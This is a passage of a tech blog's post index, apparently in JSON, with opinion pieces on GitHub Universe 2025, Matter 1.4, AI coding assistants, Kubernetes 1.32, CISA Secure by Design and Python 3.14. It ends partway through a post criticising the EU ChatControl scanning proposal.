handles boilerplate tasks with surprising competence. 
Updating API endpoints, adding error handling patterns, writing migration scripts — these are exactly the tasks that eat up a disproportionate amount of developer time.\nWhat struck me most was the natural language code review feature. You can now ask Copilot to review a PR with specific criteria — \u0026ldquo;check for SQL injection vulnerabilities\u0026rdquo; or \u0026ldquo;verify error handling follows our team patterns\u0026rdquo; — and get genuinely useful feedback. It\u0026rsquo;s not perfect, but it catches things that tired humans miss at 4 PM on a Friday.\nGitHub Spark and the Low-Code Question # GitHub Spark, their natural language app builder, generated a lot of buzz. The idea is simple: describe what you want in plain English, and Spark generates a working micro-app. No deployment pipeline, no infrastructure management — just describe and deploy.\nI have mixed feelings about this. On one hand, it democratizes app creation in a meaningful way. Business analysts who need a quick internal tool shouldn\u0026rsquo;t have to wait three sprints for engineering capacity. On the other hand, we\u0026rsquo;ve been down the low-code road before — anyone remember the promises of Visual Basic, or more recently the various \u0026ldquo;no-code\u0026rdquo; platforms? The graveyard of unmaintainable auto-generated apps is already quite full.\nThe difference this time might be that AI-generated code is at least readable. Unlike the opaque XML blobs that traditional low-code platforms produce, Spark generates standard web applications. 
When things inevitably need customization beyond what natural language can express, a developer can actually open the code and work with it.\nThe Security Angle That Deserves More Attention # Buried in the flashier announcements was something I think matters more for day-to-day engineering: Copilot Autofix for security vulnerabilities is now integrated directly into the pull request workflow. When code scanning finds a vulnerability, Copilot doesn\u0026rsquo;t just flag it — it proposes a fix with an explanation of why the original code was vulnerable.\nIn my experience, the biggest challenge with application security isn\u0026rsquo;t finding vulnerabilities — tools have been decent at that for years. The challenge is remediation speed. Developers get a security alert, add it to the backlog, and it sits there for weeks because fixing someone else\u0026rsquo;s security finding is nobody\u0026rsquo;s favorite task. Auto-generated fixes with context lower the activation energy dramatically.\nGitHub also announced that secret scanning now covers custom patterns with AI-powered detection. Instead of just matching known token formats, it can identify likely secrets based on context — variable names like api_key assigned string values that look like tokens, for instance. This is the kind of practical security improvement that prevents breaches.\nThe Broader IDE Conversation # What GitHub Universe really crystallized for me is that the IDE as we know it — that central application where you write, debug, and test code — is becoming less central. Between Copilot Workspace doing multi-file edits from an issue, Spark generating apps from descriptions, and Codespaces providing instant cloud environments, the trend is clear: the repository is the center of gravity, not the editor. This mirrors the broader shift toward agent-based systems that can handle complex workflows autonomously.\nThis resonates with something I\u0026rsquo;ve observed over the past year. 
My younger colleagues spend noticeably less time in their editors and more time in GitHub\u0026rsquo;s web interface, in Copilot Chat, and in various AI tools. They\u0026rsquo;re not worse engineers for it — they\u0026rsquo;re often more productive because they\u0026rsquo;re spending less time on mechanical tasks.\nMy Take # I\u0026rsquo;ve been skeptical of AI coding tools — not because they don\u0026rsquo;t work, but because the hype has consistently outpaced the reality. After Universe 2025, I\u0026rsquo;m adjusting my skepticism. GitHub isn\u0026rsquo;t just bolting AI onto existing workflows; they\u0026rsquo;re rethinking the workflows themselves.\nThe practical implication for engineering teams is clear: if you haven\u0026rsquo;t invested in understanding these tools, you\u0026rsquo;re falling behind. Not because AI will replace developers — that\u0026rsquo;s still a fantasy — but because teams that effectively leverage AI assistance will ship faster and with fewer bugs than teams that don\u0026rsquo;t.\nMy advice? Start with Copilot code review on your PRs. It\u0026rsquo;s the lowest-risk, highest-value entry point. Get your team comfortable with AI as a collaborator before trying the more ambitious agent-based workflows. The technology is ready; the culture needs to catch up.\n","date":"6 November 2025","externalUrl":null,"permalink":"/posts/251106-github-universe-2025-copilot-evolution/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"GitHub Universe 2025 showed us where coding is headed — and it’s less about typing code than ever before.","title":"GitHub Universe 2025 — Copilot Grows Up and the IDE Fades Further","type":"posts"},{"content":"The Connectivity Standards Alliance released the Matter 1.4 specification this month, adding support for new device types and improving the protocol\u0026rsquo;s energy management capabilities. 
Three years into Matter\u0026rsquo;s public life, it\u0026rsquo;s worth taking stock of where this ambitious interoperability standard actually stands — because the gap between the original vision and the current reality has been a source of frustration, but the trajectory is finally starting to look promising.\nWhat Matter 1.4 Actually Adds # The headline additions in Matter 1.4 include enhanced energy management features — the ability for smart home devices to report energy usage and respond to demand-response signals from utility providers. This is the kind of boring-but-important infrastructure work that makes the smart grid vision incrementally more achievable.\nNew device types include support for solar panels, batteries, heat pumps, and electric vehicle chargers within the Matter ecosystem. Water management devices like leak sensors and water valves also join the specification. None of these are going to make headline news, but they expand Matter\u0026rsquo;s coverage from \u0026ldquo;lighting and locks\u0026rdquo; to something that can plausibly manage a whole-home energy system.\nFor developers working on IoT platforms, the more interesting additions are the improvements to the commissioning flow and the enhanced multi-admin capabilities. Getting a device onto a Matter network has been one of the protocol\u0026rsquo;s roughest edges — early implementations had commissioning failure rates that would be unacceptable for consumer products. The streamlined flows in 1.4, combined with better error handling and recovery, should reduce the \u0026ldquo;I give up and return it\u0026rdquo; rate that has plagued early Matter devices.\nThe Interoperability Promise, Three Years In # Matter was announced with grand promises of universal interoperability — buy any Matter device and it works with any Matter controller, whether that\u0026rsquo;s Apple Home, Google Home, Amazon Alexa, or Samsung SmartThings. 
The reality has been more nuanced.\nOn the positive side, basic interoperability genuinely works. I have Matter-certified lights and switches in my home that work across Apple and Google ecosystems simultaneously, which would have been impossible (or at least deeply painful) three years ago. The protocol\u0026rsquo;s underlying technology — based on IPv6, running over Thread and Wi-Fi — is technically sound and avoids the fragmentation of the Zigbee/Z-Wave era.\nOn the negative side, the \u0026ldquo;works everywhere\u0026rdquo; promise has been limited by uneven controller implementations. Not every Matter controller supports every device type, and the user experience varies dramatically between platforms. An advanced feature like scene management might work beautifully with one controller and be completely absent in another. This isn\u0026rsquo;t a protocol problem — it\u0026rsquo;s an implementation problem — but users don\u0026rsquo;t care about that distinction.\nThe Developer Perspective # For those of us building IoT solutions professionally, Matter\u0026rsquo;s maturation has practical implications. The Matter SDK has stabilized significantly, and the development experience has improved from \u0026ldquo;prepare to suffer\u0026rdquo; to \u0026ldquo;mostly reasonable with occasional pain points.\u0026rdquo;\nThe SDK is built on C++, which means embedded developers feel at home but web developers face a learning curve. Third-party wrappers in Python and JavaScript exist but vary in quality and completeness. If you\u0026rsquo;re starting a new IoT product project, Matter compatibility is increasingly table stakes for consumer devices — retailers and ecosystem partners are pushing for it, and the CSA certification process, while not trivial, is well-documented.\nThread networking deserves special mention. 
The Thread border router ecosystem has expanded considerably, with most modern Apple TVs, Google Nest devices, and several third-party routers supporting Thread. This gives Matter devices a low-power mesh networking option that\u0026rsquo;s dramatically better than the Wi-Fi-only approach in terms of battery life and network reliability. If you\u0026rsquo;re building a battery-powered sensor, Thread + Matter is the combination to target.\nThe Bigger Picture: IoT Standardization # Matter exists in a broader context of IoT standardization efforts. In the industrial space, OPC UA continues to dominate. For building automation, BACnet persists. Matter\u0026rsquo;s niche is consumer and light-commercial applications, and even there it coexists with proprietary protocols from established players.\nWhat Matter has achieved, perhaps more than technical excellence, is market coordination. Getting Apple, Google, Amazon, Samsung, and hundreds of smaller players to agree on a single protocol and actually ship compatible products is a remarkable organizational achievement. The technical protocol itself is competent rather than revolutionary — but in IoT, \u0026ldquo;it actually works across vendors\u0026rdquo; is revolutionary enough.\nThe energy management additions in 1.4 also position Matter as a potential participant in the smart grid transition. As electricity grids incorporate more renewable sources with variable output, the ability for household devices to respond intelligently to grid signals — reducing consumption during peak demand, shifting EV charging to off-peak hours — becomes genuinely important. Having a standard protocol for this communication is a prerequisite for making it work at scale.\nMy Take # I\u0026rsquo;ve been working with IoT systems for over a decade, from custom Zigbee deployments to industrial MQTT architectures. 
Matter isn\u0026rsquo;t perfect — commissioning is still more complex than it should be, the specification moves slower than the market wants, and the \u0026ldquo;works everywhere equally\u0026rdquo; promise remains aspirational rather than fully realized.\nBut Matter 1.4 represents genuine progress. The device type coverage is approaching the point where a Matter-only smart home is viable for most users. The developer tooling has matured from prototype-quality to production-grade. And the industry alignment behind the standard shows no signs of fracturing.\nMy advice for IoT developers: if you\u0026rsquo;re building a consumer-facing connected device, Matter support should be in your product roadmap if it isn\u0026rsquo;t already. The certification process takes time, so start early. And if you\u0026rsquo;re building a platform that integrates with smart home devices, the Matter controller SDKs are mature enough to build on — you\u0026rsquo;ll reach more devices with less integration effort than maintaining a dozen proprietary protocol adapters.\nThe vision of a truly interoperable smart home isn\u0026rsquo;t fully realized yet, but with each specification release, it gets a little closer. Sometimes the slow march is the one that actually gets you there.\n","date":"30 October 2025","externalUrl":null,"permalink":"/posts/251030-matter-14-iot-interoperability/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The Matter smart home protocol reaches version 1.4, and while progress has been slower than promised, the interoperability story is finally getting convincing.","title":"Matter 1.4 and the Slow March Toward IoT Sanity","type":"posts"},{"content":"It\u0026rsquo;s been roughly two and a half years since GitHub Copilot went generally available and kicked off the AI coding assistant wave. 
In that time, we\u0026rsquo;ve gone from \u0026ldquo;it\u0026rsquo;s autocomplete on steroids\u0026rdquo; to tools that can reason about entire codebases, plan multi-file changes, and execute complex refactoring tasks with increasing reliability. The latest updates from GitHub, Cursor, and several other players this month make it clear: we\u0026rsquo;re entering a new phase where these tools are less about generating code snippets and more about augmenting the entire development workflow.\nFrom Suggestions to Agents # The most significant shift in AI coding assistants over the past year has been the move from passive suggestion to active agency. GitHub Copilot Workspace and similar features don\u0026rsquo;t just suggest the next line of code — they understand the intent behind a task and can propose coordinated changes across multiple files. This mirrors the broader emergence of agent-based systems that can handle complex workflows autonomously.\nI\u0026rsquo;ve been using Copilot Workspace for several months now, and the experience is qualitatively different from traditional autocomplete. When I describe a bug fix or a feature in natural language, it generates a plan that identifies the relevant files, proposes specific changes, and lets me review and modify the plan before executing it. It\u0026rsquo;s not perfect — maybe 60-70% of the plans need adjustment — but even imperfect plans save time because they front-load the thinking about which files need to change.\nCursor has taken a slightly different approach with its tight integration of AI into the editor itself. The ability to select a block of code, describe what you want to change about it, and get a contextually aware diff has become part of my daily workflow. 
For routine refactoring — renaming concepts across a codebase, updating API call patterns, migrating from one library to another — these tools are genuinely faster than doing it manually.\nThe Codebase Understanding Problem # The limiting factor for AI coding assistants has always been context. A model that can only see the current file is dramatically less useful than one that understands your entire project. This is where the recent improvements have been most impactful.\nRAG (Retrieval-Augmented Generation) over codebases has become standard. Tools now index your project, understand import relationships, and can pull in relevant context from files you haven\u0026rsquo;t opened. This capability aligns with how modern LLMs like Claude handle large context windows and complex reasoning. When I ask for help with a function, the assistant knows about the types it depends on, the tests that cover it, and the patterns used elsewhere in the project.\nThe practical impact is significant. Earlier this year, I was onboarding to a large Python codebase — about 200,000 lines across dozens of packages. Being able to ask the AI \u0026ldquo;how does the authentication flow work in this project?\u0026rdquo; and get an accurate walkthrough with file references saved me days of manual code archaeology. This is where AI assistants provide the most value — not in writing new code, but in understanding existing code.\nWhat\u0026rsquo;s Actually Working in Production # After extensive use across several projects, I\u0026rsquo;ve developed a clear mental model of where AI coding assistants deliver real value and where they fall short:\nHigh value: Boilerplate generation, test writing, documentation, code explanation, regex and SQL writing, API integration code, standard CRUD operations. 
Anything where the pattern is well-established and the AI has seen thousands of examples.\nMedium value: Bug diagnosis (pointing in the right direction), refactoring suggestions, code review assistance, learning new frameworks. Useful but requires active human judgment.\nLow value: Complex architectural decisions, novel algorithm design, performance optimization of critical paths, security-sensitive code. These still require deep human expertise and the AI can actually be dangerous here by producing plausible-looking but subtly wrong solutions.\nThe teams I see getting the most value from AI assistants are the ones that have internalized this mental model. They use AI aggressively for the high-value tasks, critically for the medium-value ones, and avoid over-relying on it for low-value scenarios.\nThe Productivity Question # The elephant in the room is productivity measurement. GitHub\u0026rsquo;s internal studies claim 55% faster task completion with Copilot. Various other studies have shown numbers ranging from 20% to 75% improvement depending on the task and the developer\u0026rsquo;s experience level.\nMy personal experience: for the tasks where AI assistants excel (boilerplate, tests, documentation), the speedup is easily 2-3x. For complex feature work, the benefit is more modest — maybe 10-20%, mostly from faster context gathering and less time looking up API documentation. Overall, I\u0026rsquo;d estimate a 25-30% productivity improvement for my typical work mix, which is substantial.\nBut raw speed isn\u0026rsquo;t the whole story. I\u0026rsquo;ve noticed that AI assistants subtly change how I work. I write more tests because the marginal cost of writing tests has dropped dramatically. I add more documentation because generating a good docstring takes seconds. I refactor more aggressively because the AI can handle the mechanical parts of a refactoring. 
These qualitative improvements in code quality might matter more than the raw speed gains.\nMy Take # We\u0026rsquo;re past the \u0026ldquo;is AI coding useful?\u0026rdquo; debate. It is. The interesting questions now are about integration depth, team workflows, and long-term skill development. I have some concerns about junior developers over-relying on AI for code they don\u0026rsquo;t fully understand — the learning process of struggling with a problem has real value that you lose when the AI just gives you the answer.\nBut for experienced developers who can critically evaluate AI output, these tools are a genuine force multiplier. My recommendation: invest time in learning the advanced features of your chosen tool. Most developers I talk to are using maybe 20% of what their AI assistant can do. Explore multi-file editing, codebase Q\u0026amp;A, and the emerging agentic features. The productivity ceiling is much higher than most people realize.\nThe next frontier is AI assistants that can run code, execute tests, and iterate on their own output. We\u0026rsquo;re seeing early versions of this already. AI-assisted testing is one domain where this capability is already proving valuable, and it\u0026rsquo;s going to change the development workflow even more fundamentally than autocomplete did.\n","date":"23 October 2025","externalUrl":null,"permalink":"/posts/251023-ai-coding-assistants-beyond-autocomplete/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"AI coding assistants have evolved from glorified autocomplete to genuine development partners, and the implications for how we build software are becoming clearer.","title":"AI Coding Assistants Are Growing Up — Beyond Autocomplete","type":"posts"},{"content":"Kubernetes 1.32 is here, and while it\u0026rsquo;s not the kind of release that generates breathless headlines, it\u0026rsquo;s exactly the kind of release that makes platform engineers\u0026rsquo; lives measurably better. 
After nearly a decade of Kubernetes being the de facto container orchestration standard, the project has settled into a rhythm of steady, meaningful improvements rather than dramatic architectural shifts. That\u0026rsquo;s a sign of maturity, and frankly, it\u0026rsquo;s what the ecosystem needs.\nSidecar Containers Graduate # The most significant feature in 1.32 is the graduation of native sidecar containers to stable. This has been a long time coming. The init container-based sidecar pattern that was introduced in 1.28 has been refined over several releases, and it\u0026rsquo;s now production-ready with proper lifecycle management.\nIf you\u0026rsquo;ve ever fought with sidecar ordering issues — your application container starting before the Envoy proxy is ready, or your logging sidecar being killed before the main container finishes flushing its buffers — you know why this matters. Native sidecar support means these containers start before and terminate after the main application containers, with proper health checking at each stage.\nFor service mesh users in particular, this is a quality-of-life improvement that eliminates an entire category of intermittent startup failures. I\u0026rsquo;ve spent more hours than I\u0026rsquo;d like to admit debugging \u0026ldquo;connection refused\u0026rdquo; errors that turned out to be race conditions between application startup and proxy readiness. Those days should be behind us. Advanced container security practices build on these foundational lifecycle improvements. The recent Ingress nightmare vulnerability demonstrated exactly how critical proper sidecar and container lifecycle management is for security and stability.\nResource Management Gets Smarter # The improvements to resource management in 1.32 continue the trend of making Kubernetes more efficient in how it allocates and tracks compute resources. 
The in-place resource resize feature, which allows you to change CPU and memory limits on running pods without restarting them, has seen further stabilization.\nIn practice, this means you can respond to load changes more gracefully. Instead of killing a pod and rescheduling it with new resource limits — which might trigger service disruption if you\u0026rsquo;re not careful with your PodDisruptionBudgets — you can adjust limits on the fly. Combined with the Vertical Pod Autoscaler, this creates a much more responsive resource management loop. This approach aligns with broader platform engineering trends that emphasize automation and reduced manual intervention.\nThe memory manager improvements also deserve attention. Better NUMA-aware memory allocation helps workloads sensitive to memory locality, increasingly relevant as organizations run more ML inference workloads on Kubernetes. Getting memory allocation wrong in a NUMA topology can tank inference latency, and these improvements make it easier to express and enforce the right memory placement policies.\nThe Simplification Agenda # What I appreciate most about recent Kubernetes releases is the continued effort to simplify operations. The improvements to kubectl debugging, the ongoing work to reduce the API surface area where possible, and better defaults all contribute to making Kubernetes less operationally expensive.\nThe enhanced Gateway API support in this release is a good example. Gateway API has been steadily replacing Ingress as the recommended way to manage traffic routing, and 1.32 adds better support for traffic splitting and header-based routing at the API level. If you\u0026rsquo;re still using Ingress resources with provider-specific annotations — and let\u0026rsquo;s be honest, most of us are — this release is a good prompt to start evaluating the migration. 
Beyond load balancing, security hardening practices for Kubernetes are equally important as new features.\nThe ValidatingAdmissionPolicy improvements also reduce the need for external webhook-based policy engines for common validation scenarios. Being able to express policies in CEL (Common Expression Language) directly in the API server, without running a separate webhook service, eliminates a potential failure point and simplifies the admission control stack. Compliance and policy frameworks increasingly leverage these in-cluster policy capabilities. This aligns with the broader shift toward infrastructure-as-code practices, policy-as-code patterns, and cloud cost management strategies that reduce operational overhead.\nThe Broader Cloud-Native Landscape # Kubernetes 1.32 doesn\u0026rsquo;t exist in isolation. The broader cloud-native ecosystem continues to consolidate around patterns that would have seemed exotic a few years ago. GitOps with ArgoCD or Flux is now the default deployment model for most teams I work with. Platform engineering teams are building internal developer platforms on top of Kubernetes rather than exposing raw cluster access. And eBPF-based networking and observability through projects like Cilium and Tetragon are replacing traditional iptables-based networking. The observability maturity with OpenTelemetry standards means containers and orchestration are now first-class observability concerns.\nThe result is that the Kubernetes experience in late 2025 is dramatically different from what it was even two years ago. You\u0026rsquo;re less likely to be writing raw YAML manifests and more likely to be interacting with a platform team\u0026rsquo;s abstractions. That\u0026rsquo;s healthy — Kubernetes was always meant to be infrastructure, not a user interface. For teams managing cloud infrastructure across multiple providers, multi-cloud strategies are increasingly important alongside Kubernetes adoption. 
Infrastructure-as-code tools like OpenTofu provide better choices for declaring and managing cloud-native infrastructure.\nSub-Hub: Kubernetes \u0026amp; Container Orchestration # For a comprehensive view of how Kubernetes has matured from operational challenge to invisible foundation, see Kubernetes \u0026amp; Container Orchestration — From Infrastructure to Invisible Foundation. This sub-hub explores Kubernetes\u0026rsquo;s role in modern infrastructure, from security to AI workload orchestration.\nMy Take # I\u0026rsquo;ve been running Kubernetes in production since the 1.6 days, and the contrast with where we are now is striking. The platform has gone from \u0026ldquo;exciting but rough\u0026rdquo; to \u0026ldquo;boring infrastructure that just works\u0026rdquo; — which is exactly where you want your container orchestrator to be. The broader shift toward agent-ready architectures depends on this foundational infrastructure maturity.\nMy advice for teams on older versions: the upgrade path to 1.32 is well-documented and breaking changes are minimal. The sidecar container graduation alone is worth the upgrade if you\u0026rsquo;re running any kind of service mesh. If you\u0026rsquo;re still on iptables-based kube-proxy, this is a reasonable time to evaluate the nftables backend. OpenTofu\u0026rsquo;s maturity provides a solid foundation for codifying your Kubernetes infrastructure.\nKubernetes isn\u0026rsquo;t going anywhere, and releases like 1.32 demonstrate why. Steady, backward-compatible improvements that respect the massive installed base while continuing to evolve the platform. That\u0026rsquo;s good engineering. 
The platform\u0026rsquo;s continued maturity benefits all use cases.\n","date":"16 October 2025","externalUrl":null,"permalink":"/posts/251016-kubernetes-132-platform-maturity/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Kubernetes 1.32 arrives with improvements to sidecar containers, resource management, and the continued push to simplify the platform for operators.","title":"Kubernetes 1.32 — The Platform Keeps Maturing","type":"posts"},{"content":"CISA\u0026rsquo;s Secure by Design initiative has been building momentum throughout 2025, and this week\u0026rsquo;s updated guidance and the growing list of vendor commitments signal that we might be witnessing a genuine shift in how the software industry approaches security. After decades of treating security as an afterthought — something to bolt on after shipping — regulatory and market pressures are converging to make \u0026ldquo;secure by default\u0026rdquo; more than just a slogan.\nFrom Voluntary Pledges to Industry Expectations # When CISA first launched the Secure by Design pledge in May 2024, I was cautiously optimistic but skeptical about enforcement. Voluntary commitments in tech have a mixed track record, to put it diplomatically. But the landscape has shifted faster than I expected.\nOver 200 software companies have now signed the pledge, committing to concrete actions like eliminating default passwords, implementing multi-factor authentication by default, and reducing entire classes of vulnerabilities. More importantly, major enterprise procurement teams are starting to use pledge compliance as a vendor selection criterion. When security commitments affect revenue, they tend to get taken seriously.\nThe updated guidance released this week adds more specific technical recommendations around memory-safe languages, SBOM (Software Bill of Materials) requirements, and vulnerability disclosure timelines. 
These aren\u0026rsquo;t revolutionary ideas — the security community has been advocating for them for years — but having them codified in government-backed guidance gives engineering teams ammunition to justify the investment to business stakeholders.\nThe Memory Safety Conversation Gets Practical # One of the most impactful elements of CISA\u0026rsquo;s push has been the emphasis on memory-safe languages. The NSA and CISA guidance recommending migration away from C and C++ for new projects has moved from \u0026ldquo;interesting recommendation\u0026rdquo; to \u0026ldquo;thing procurement officers ask about.\u0026rdquo;\nI\u0026rsquo;ve been writing software long enough to remember when buffer overflows were considered an inevitable cost of doing business. The data is unambiguous — memory safety issues account for roughly 70% of serious vulnerabilities in large C/C++ codebases, according to studies from Microsoft and Google. The industry push toward Rust, Go, and other memory-safe alternatives isn\u0026rsquo;t just about developer preferences; it\u0026rsquo;s becoming a supply chain security requirement.\nWhat\u0026rsquo;s practical about CISA\u0026rsquo;s approach is that they\u0026rsquo;re not demanding immediate rewrites of legacy systems. The guidance focuses on new development and critical components, which is the only realistic path forward. You can\u0026rsquo;t rewrite 40 years of C infrastructure overnight, but you can make sure your new HTTP parser or TLS implementation uses a language that won\u0026rsquo;t let you accidentally create a remote code execution vulnerability.\nSupply Chain Security Matures # The SBOM requirements that are now being woven into government procurement and increasingly into private sector contracts represent the other major shift. 
After the SolarWinds and Log4j incidents demonstrated how fragile software supply chains can be, the industry has been slowly building the tooling and processes to actually track what\u0026rsquo;s in our software.\nTools like Syft, Trivy, and the SPDX/CycloneDX standards have matured significantly. Most CI/CD pipelines can now generate an SBOM as part of the build process with minimal friction. The challenge has shifted from \u0026ldquo;how do we generate an SBOM\u0026rdquo; to \u0026ldquo;how do we make SBOMs actionable\u0026rdquo; — meaning, how do you efficiently correlate a newly discovered vulnerability against every deployed system that contains the affected component?\nThis is where I think the next wave of innovation will happen. The generation problem is largely solved. The consumption and response problem is where most organizations still struggle. When the next Log4j-scale vulnerability drops, can your organization answer \u0026ldquo;are we affected?\u0026rdquo; in minutes rather than days?\nThe Developer Experience Gap # My one concern with the Secure by Design push is the developer experience gap. Security tooling has historically been built for security teams, not for developers. When you mandate SAST scans, dependency checks, and SBOM generation in every pipeline, you need those tools to be fast, accurate, and low-friction — or developers will find ways to work around them.\nThe best security tools in 2025 are the ones that feel invisible. GitHub\u0026rsquo;s Dependabot, Snyk\u0026rsquo;s IDE integrations, and similar tools that surface vulnerabilities at the point where developers can actually fix them — in the editor and in the PR — represent the right model. The worst are the ones that generate 500-item reports of mostly false positives that nobody reads.\nMy Take # I\u0026rsquo;ve lived through enough security \u0026ldquo;revolutions\u0026rdquo; to be wary of declaring victory prematurely. 
But CISA\u0026rsquo;s Secure by Design initiative feels different because it\u0026rsquo;s attacking the problem from the economic side, not just the technical side. When secure software becomes a procurement advantage and insecure software becomes a liability, the incentive structure changes fundamentally.\nFor engineering teams, my advice is straightforward: if you haven\u0026rsquo;t already, integrate SBOM generation into your build pipeline this quarter. Evaluate your new projects\u0026rsquo; language choices through a memory safety lens. And read the CISA guidance — it\u0026rsquo;s surprisingly practical and well-written for a government document.\nThe window to be ahead of these requirements is closing. Better to adopt them voluntarily now, on your own timeline, than to scramble when they become contractual obligations.\n","date":"9 October 2025","externalUrl":null,"permalink":"/posts/251009-cisa-secure-by-design-traction/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"CISA’s Secure by Design initiative is moving from voluntary pledges to measurable industry impact, and software vendors are starting to feel the pressure.","title":"Secure by Design — CISA's Push Is Finally Gaining Real Traction","type":"posts"},{"content":"Python 3.14 dropped this week, and for the first time in a long while, the headline features aren\u0026rsquo;t about syntax sugar or new standard library modules — they\u0026rsquo;re about raw performance and concurrency. The free-threaded build (no-GIL mode) introduced experimentally in 3.13 has received significant stabilization work, and the experimental JIT compiler has grown more capable. After thirty years of writing Python, I can say this release feels like a genuine inflection point.\nThe GIL Is Loosening Its Grip # The Global Interpreter Lock has been Python\u0026rsquo;s most discussed limitation for as long as I can remember. 
PEP 703, which laid the groundwork for a GIL-optional build, started bearing fruit in 3.13 with the experimental --disable-gil build flag. In 3.14, the free-threaded build has moved from \u0026ldquo;brave early adopters only\u0026rdquo; to something that a growing number of C extension authors are actively supporting.\nWhat\u0026rsquo;s changed? The reference counting mechanism has been further optimized for thread safety, and the team has addressed several race conditions that plagued early adopters. More importantly, NumPy, pip, and several core scientific computing libraries have been shipping free-threaded compatible wheels, which means you can actually use this mode for real workloads without immediately hitting extension compatibility walls. This mirrors the ongoing evolution we\u0026rsquo;ve seen in language ecosystems where safety and performance improvements compound over time.\nI\u0026rsquo;ve been testing some of my data pipeline code with the free-threaded build, and the results are promising — though not without caveats. CPU-bound multi-threaded workloads see genuine speedups, but memory usage is notably higher due to the biased reference counting scheme. For I/O-bound work, which is where most of my production Python lives, the difference is negligible since asyncio already handles that well.\nThe JIT Compiler Grows Up # The copy-and-patch JIT compiler, also introduced experimentally in 3.13, has received substantial improvements. It now handles a wider range of bytecode operations and the performance gains are more consistent. In my benchmarks, compute-heavy pure Python code runs roughly 10-15% faster with the JIT enabled, which isn\u0026rsquo;t going to replace C extensions for hot loops, but it meaningfully improves the baseline.\nWhat excites me more than the current numbers is the architecture. The JIT is designed to be incrementally improved — each release can teach it new optimization patterns without breaking backward compatibility. 
This is the kind of long-term infrastructure investment that pays compounding dividends.\nThe team has also improved the tier-2 optimizer that feeds into the JIT, with better specialization for common patterns like attribute access and dictionary operations. If you\u0026rsquo;re writing typical web application code, these are exactly the operations that dominate your runtime.\nWhat This Means for the Ecosystem # The practical impact of 3.14 depends heavily on your use case and your timeline. If you\u0026rsquo;re running a Django or Flask application, upgrading to 3.14 gets you modest performance improvements out of the box from general interpreter optimizations, with more available if you opt in to the still-experimental JIT, which is off by default. The free-threaded build isn\u0026rsquo;t something I\u0026rsquo;d recommend for production web services yet — the ecosystem compatibility story still has gaps, and WSGI/ASGI servers need more time to mature their threading models.\nWhere I see the most immediate impact is in data science and ML pipelines. The combination of free-threading and libraries like NumPy that are already compatible means you can build genuinely parallel data processing pipelines in pure Python without reaching for multiprocessing and its serialization overhead. This capability aligns with how modern AI systems are moving toward more sophisticated reasoning and orchestration, where Python\u0026rsquo;s combination of flexibility and performance pays off. For teams that have been fighting with multiprocessing.Pool and pickle limitations for years, this is a real quality-of-life improvement.\nThe typing improvements in 3.14 also deserve mention: deferred evaluation of annotations (PEP 649 and PEP 749) removes most of the need for quoted forward references and makes the gradual typing story more complete. Better type support enables the kind of complex tooling and autonomous systems that benefit from strong static guarantees. 
For large codebases, these incremental typing improvements compound into significantly better tooling support.\nMy Take # I\u0026rsquo;ve seen Python evolve from a scripting curiosity to the dominant language in data science and a major player in web development. This release feels different from the usual \u0026ldquo;nice new features\u0026rdquo; updates. The performance work in 3.13 and 3.14 represents a fundamental shift in the project\u0026rsquo;s priorities — acknowledging that Python\u0026rsquo;s future depends on being fast enough that \u0026ldquo;rewrite it in Rust\u0026rdquo; isn\u0026rsquo;t the default answer for every performance-sensitive component.\nThe free-threaded build won\u0026rsquo;t be the default for at least another release or two, and that\u0026rsquo;s the right call. But the trajectory is clear: Python is systematically removing the technical limitations that have defined it for decades, while preserving the simplicity that made it successful in the first place.\nMy recommendation? Start testing your CI pipelines with the free-threaded build now, even if you don\u0026rsquo;t plan to deploy it yet. Identify which of your dependencies support it and which don\u0026rsquo;t. When the switch eventually flips, you\u0026rsquo;ll want to be ready — and you\u0026rsquo;ll want your upstream dependencies to know you care about compatibility.\nThe Python team has proven they can execute on ambitious multi-year technical roadmaps. 
I\u0026rsquo;m genuinely optimistic about where 3.15 and 3.16 take this.\n","date":"2 October 2025","externalUrl":null,"permalink":"/posts/251002-python-314-free-threading-jit/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Python 3.14 arrives with maturing free-threading support and an experimental JIT compiler, signaling a new performance era for the language.","title":"Python 3.14 Lands — Free-Threading and the JIT Take Shape","type":"posts"},{"content":"The EU\u0026rsquo;s ChatControl proposal is back in the headlines this week, and if you haven\u0026rsquo;t been following this saga, you should be — because it has the potential to fundamentally undermine end-to-end encryption for hundreds of millions of people. This connects to broader regulatory efforts like the EU AI Act that are reshaping how digital systems operate in Europe. A detailed analysis circulating on Hacker News has pushed the discussion to over 1,100 upvotes and 630 comments, reflecting the intense concern in the technical community.\nThe proposal, at its core, would require messaging platforms — including those offering end-to-end encryption — to scan private messages for illegal content. Earlier this month, Germany secured a blocking minority against the proposal, but it keeps coming back in modified forms. The latest iteration is particularly concerning for anyone who understands how cryptography actually works.\nThe Technical Impossibility # Let me be uncharacteristically blunt: you cannot scan encrypted messages without breaking encryption. This isn\u0026rsquo;t a political opinion; it\u0026rsquo;s mathematics.\nEnd-to-end encryption means that only the sender and recipient can read a message. The platform operator cannot. A court order cannot. A government agency cannot. That\u0026rsquo;s the entire point. 
If you introduce a mechanism to scan message content — whether on the device before encryption (\u0026ldquo;client-side scanning\u0026rdquo;) or through some key escrow arrangement — you have created a vulnerability that can be exploited.\nThe EU proposal\u0026rsquo;s supporters argue that client-side scanning is different from \u0026ldquo;breaking encryption\u0026rdquo; because the encryption itself remains intact during transit. This is technically true in the narrowest possible sense, and completely misleading in practice. If my device scans my message before encrypting it and reports the content to a third party, the practical effect is identical to having no encryption at all.\nSecurity researchers have been making this argument for years. A 2021 open letter signed by hundreds of cryptographers and security experts laid out the case clearly. Nothing has changed since then — the math hasn\u0026rsquo;t gotten more cooperative.\nClient-Side Scanning: A Closer Look # The client-side scanning approach deserves particular scrutiny because it\u0026rsquo;s being presented as a reasonable compromise. The idea is: before you send a message, your device checks it against a database of known illegal content (typically using perceptual hashing) and flags matches.\nThe problems are numerous:\nFalse positives: Perceptual hashing is imprecise by design. It\u0026rsquo;s meant to catch variations of known images, but it can also match innocent content. Apple announced a client-side scanning system for iCloud Photos in 2021 and shelved it before launch after researchers demonstrated hash collisions and raised false-positive concerns.\nDatabase integrity: Who controls the hash database? What prevents a government from adding political content, protest images, or journalism to the scanning database? The technical architecture 